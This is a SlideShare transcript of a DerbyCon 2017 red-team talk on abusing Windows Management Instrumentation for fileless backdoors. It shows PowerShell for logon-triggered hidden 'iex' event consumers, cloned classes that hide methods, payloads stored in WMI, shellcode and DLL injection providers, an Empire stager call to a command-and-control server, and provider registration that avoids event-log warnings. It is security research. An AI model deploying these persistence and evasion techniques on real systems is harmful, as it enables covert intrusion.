SlideShare a Scribd company logo

Building Better Backdoors with WMI - DerbyCon 2017

A
Alexander Polce Leary

This document discusses using Windows Management Instrumentation (WMI) to create fileless backdoors and persistent implants. It begins with an overview of WMI and its class structure. It then covers duplicating existing WMI classes to hide backdoor methods and storing payloads in WMI properties. The document also introduces creating custom WMI providers using .NET to implement backdoor functionality directly in WMI. It concludes by examining options for registering custom WMI providers, including manually registering through WMI calls to avoid event log warnings. In summary, the document explores abusing WMI's class inheritance and provider models to develop advanced fileless and persistent backdoors on Windows systems.

Technology
1 of 47
BUILDING BETTER BACKDOORS WITH WMI
2 Confidential & Proprietary WHO AM I  Alexander Polce Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
3 Confidential & Proprietary OUTLINE 1. WMI Overview 2. Fileless Backdoors 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
4 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
5 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
6 Confidential & Proprietary6 Confidential & Proprietary FILELESS BACKDOORS INVOKE-WMIDUPLICATECLASS
7 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
8 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
9 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
10 Confidential & Proprietary
11 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
12 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
13 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
14 Confidential & Proprietary
15 Confidential & Proprietary15 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
16 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
17 Confidential & Proprietary
18 Confidential & Proprietary18 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
19 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
20 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators to a class and your done  [ManagementEntity]  [ManagementTask] https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885
21 Confidential & Proprietary BASIC BACKDOOR  Command Execution  ShellCode Runner  Dll Injector  PE Injector https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider https://github.com/subTee/EvilWMIProvider
22 Confidential & Proprietary
23 Confidential & Proprietary BASIC WMI BACKDOOR
24 Confidential & Proprietary
25 Confidential & Proprietary BETTER WMI BACKDOOR  Store Payload as Base64 Encoded String in WMI, and then inject the payload  ShellCode Runner  Dll Injector  PE Injector
26 Confidential & Proprietary BETTER WMI BACKDOOR
27 Confidential & Proprietary
28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Stager? Why not? $language = “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
29 Confidential & Proprietary EMPIRE – POWERSHELL AGENT
30 Confidential & Proprietary
31 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
32 Confidential & Proprietary EMPIRE - .NET AGENT
33 Confidential & Proprietary33 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
34 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
35 Confidential & Proprietary
36 Confidential & Proprietary
37 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
38 Confidential & Proprietary
39 Confidential & Proprietary
40 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
41 Confidential & Proprietary MANUAL REGISTRATION That looks hard
42 Confidential & Proprietary MANUAL REGISTRATION It was
43 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
44 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
45 Confidential & Proprietary
46 Confidential & Proprietary
47 Confidential & Proprietary Questions?

Recommended

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 

Recommended

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
Will Schroeder
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
CNIT 124 Ch 13: Post Exploitation (Part 1)
CNIT 124 Ch 13: Post Exploitation (Part 1)CNIT 124 Ch 13: Post Exploitation (Part 1)
CNIT 124 Ch 13: Post Exploitation (Part 1)
Sam Bowne
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 

More Related Content

What's hot

(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 

What's hot (20)

Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
CNIT 124 Ch 13: Post Exploitation (Part 1)
CNIT 124 Ch 13: Post Exploitation (Part 1)CNIT 124 Ch 13: Post Exploitation (Part 1)
CNIT 124 Ch 13: Post Exploitation (Part 1)
 

Viewers also liked

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
Chris Thompson
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
Symantec Security Response
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
PacSecJP
 

Viewers also liked (15)

SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
PuppetConf 2017: Inviting Windows to the Puppet Party- Chris Kittell & Derek ...
 
WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017WMI for Penetration Testers - Arcticcon 2017
WMI for Penetration Testers - Arcticcon 2017
 
Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)Taking the Attacker Eviction Red Pill (v2.0)
Taking the Attacker Eviction Red Pill (v2.0)
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Catching fileless attacks
Catching fileless attacksCatching fileless attacks
Catching fileless attacks
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
 

Similar to Building Better Backdoors with WMI - DerbyCon 2017

Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
Lai Yoong Seng
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
OW2
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
Rob Ragan
 
Integrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight ApplicationsIntegrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight Applications
Dan Wahlin
 

Similar to Building Better Backdoors with WMI - DerbyCon 2017 (20)

2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools2018 Writing Offensive .Net Tools
2018 Writing Offensive .Net Tools
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
 
Introduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShellIntroduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShell
 
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Webauthn Tutorial
Webauthn TutorialWebauthn Tutorial
Webauthn Tutorial
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Advanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMIAdvanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMI
 
Win32 Perl Wmi
Win32 Perl WmiWin32 Perl Wmi
Win32 Perl Wmi
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Integrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight ApplicationsIntegrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight Applications
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery ManagerVMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
 
Malware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual MachinesMalware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual Machines
 

Recently uploaded

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Recently uploaded (20)

Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
